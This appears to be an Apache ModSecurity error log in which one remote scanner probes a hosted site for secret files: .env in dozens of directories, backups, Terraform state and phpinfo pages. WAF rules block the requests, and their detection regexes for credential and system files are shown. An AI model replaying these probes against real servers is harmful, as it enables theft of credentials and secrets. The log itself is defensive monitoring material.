[Tue May 26 15:32:30.362170 2026] [security2:error] [pid 724639:tid 724766] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/nodeapi/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pfwAAlH4"]
[Tue May 26 15:32:30.366511 2026] [security2:error] [pid 724639:tid 724643] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/nodeweb/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pgAAAxQM"]
[Tue May 26 15:32:30.379143 2026] [security2:error] [pid 724639:tid 724765] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/old/.env"] [unique_id "ahVvthKJRbiNp3eWdT1phAAAo30"]
[Tue May 26 15:32:30.407163 2026] [security2:error] [pid 724639:tid 724820] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvtRKJRbiNp3eWdT1pRgAAALg"]
[Tue May 26 15:32:30.421607 2026] [security2:error] [pid 724639:tid 724690] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/opt/.env"] [unique_id "ahVvthKJRbiNp3eWdT1phgAA3DI"]
[Tue May 26 15:32:30.595811 2026] [security2:error] [pid 724639:tid 724707] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/php-info.php"] [unique_id "ahVvthKJRbiNp3eWdT1pnQAAtUM"]
[Tue May 26 15:32:30.596673 2026] [security2:error] [pid 724639:tid 724726] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/php.php"] [unique_id "ahVvthKJRbiNp3eWdT1pngAAtVY"]
[Tue May 26 15:32:30.600167 2026] [security2:error] [pid 724639:tid 724727] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/php_info.php"] [unique_id "ahVvthKJRbiNp3eWdT1pnwAAr1c"]
[Tue May 26 15:32:30.644632 2026] [security2:error] [pid 724639:tid 724713] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/phpinfo.php"] [unique_id "ahVvthKJRbiNp3eWdT1powAAvEk"]
[Tue May 26 15:32:30.656402 2026] [security2:error] [pid 724639:tid 724732] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/portal/.env"] [unique_id "ahVvthKJRbiNp3eWdT1ppwAA_1w"]
[Tue May 26 15:32:30.665156 2026] [security2:error] [pid 724639:tid 724714] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/prod/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pqwAA8ko"]
[Tue May 26 15:32:30.670867 2026] [security2:error] [pid 724639:tid 724720] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/product/.env"] [unique_id "ahVvthKJRbiNp3eWdT1prQAAllA"]
[Tue May 26 15:32:30.687595 2026] [security2:error] [pid 724639:tid 724715] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/production/.env"] [unique_id "ahVvthKJRbiNp3eWdT1prgAA6Us"]
[Tue May 26 15:32:30.724447 2026] [security2:error] [pid 724639:tid 724717] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/project/.env"] [unique_id "ahVvthKJRbiNp3eWdT1psQAA3k0"]
[Tue May 26 15:32:30.742900 2026] [security2:error] [pid 724639:tid 724723] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/public-api/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pswAA_FM"]
[Tue May 26 15:32:30.747011 2026] [security2:error] [pid 724639:tid 724722] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/public/.env"] [unique_id "ahVvthKJRbiNp3eWdT1ptAAApVI"]
[Tue May 26 15:32:30.779892 2026] [security2:error] [pid 724639:tid 724724] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/public/phpinfo.php"] [unique_id "ahVvthKJRbiNp3eWdT1ptQAA_VQ"]
[Tue May 26 15:32:30.801135 2026] [security2:error] [pid 724639:tid 724753] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/public_html/.env"] [unique_id "ahVvthKJRbiNp3eWdT1ptwAAsHE"]
[Tue May 26 15:32:30.810025 2026] [security2:error] [pid 724639:tid 724728] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/qa/.env"] [unique_id "ahVvthKJRbiNp3eWdT1puQAA3Vg"]
[Tue May 26 15:32:31.103918 2026] [security2:error] [pid 724639:tid 724650] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/s3/.env.bak"] [unique_id "ahVvtxKJRbiNp3eWdT1p4AAAuAo"]
[Tue May 26 15:32:31.223871 2026] [security2:error] [pid 724639:tid 724661] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/server/api/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1p8wABARU"]
[Tue May 26 15:32:31.224051 2026] [security2:error] [pid 724639:tid 724657] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/server/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1p8gABARE"]
[Tue May 26 15:32:31.273605 2026] [security2:error] [pid 724639:tid 724662] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/server/backend/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1p9QAA4RY"]
[Tue May 26 15:32:31.334218 2026] [security2:error] [pid 724639:tid 724676] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/service/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qAQAAxiQ"]
[Tue May 26 15:32:31.334607 2026] [security2:error] [pid 724639:tid 724677] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/services/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qAgAAxiU"]
[Tue May 26 15:32:31.442733 2026] [security2:error] [pid 724639:tid 724687] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/shop/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qCwAAyC8"]
[Tue May 26 15:32:31.453106 2026] [security2:error] [pid 724639:tid 724692] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/shared/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qDwAA-DQ"]
[Tue May 26 15:32:31.483845 2026] [security2:error] [pid 724639:tid 724688] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/src/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qEwAAqjA"]
[Tue May 26 15:32:31.601731 2026] [security2:error] [pid 724639:tid 724699] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/srv/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qHwAAjjs"]
[Tue May 26 15:32:31.607839 2026] [security2:error] [pid 724639:tid 724701] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/stage/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qIAAAqT0"]
[Tue May 26 15:32:31.612701 2026] [security2:error] [pid 724639:tid 724696] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/staging/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qIQAAtzg"]
[Tue May 26 15:32:31.697126 2026] [security2:error] [pid 724639:tid 724705] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/stg/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qLQAAwUE"]
[Tue May 26 15:32:31.757577 2026] [security2:error] [pid 724639:tid 724707] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/stripe/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qOAAAsEM"]
[Tue May 26 15:32:31.766873 2026] [cgid:error] [pid 724639:tid 724697] [remote 195.178.110.199:46950] AH01264: stderr from /home2/jhonwy9v/stvica.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 15:32:31.781449 2026] [security2:error] [pid 724639:tid 724732] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVvtxKJRbiNp3eWdT1qPwAAulw"]
[Tue May 26 15:32:31.880072 2026] [security2:error] [pid 724639:tid 724736] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/test.php"] [unique_id "ahVvtxKJRbiNp3eWdT1qSgAAp2A"]
[Tue May 26 15:32:31.890200 2026] [security2:error] [pid 724639:tid 724720] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/test/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qSwAA51A"]
[Tue May 26 15:32:31.906083 2026] [security2:error] [pid 724639:tid 724717] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/user/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qTwAAz00"]
[Tue May 26 15:32:31.907260 2026] [security2:error] [pid 724639:tid 724721] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/v1/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qUAAAz1E"]
[Tue May 26 15:32:31.913782 2026] [security2:error] [pid 724639:tid 724722] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/v2/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qUgAAzlI"]
[Tue May 26 15:32:31.922757 2026] [security2:error] [pid 724639:tid 724725] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/v3/.env"] [unique_id "ahVvtxKJRbiNp3eWdT1qVAAAtFU"]
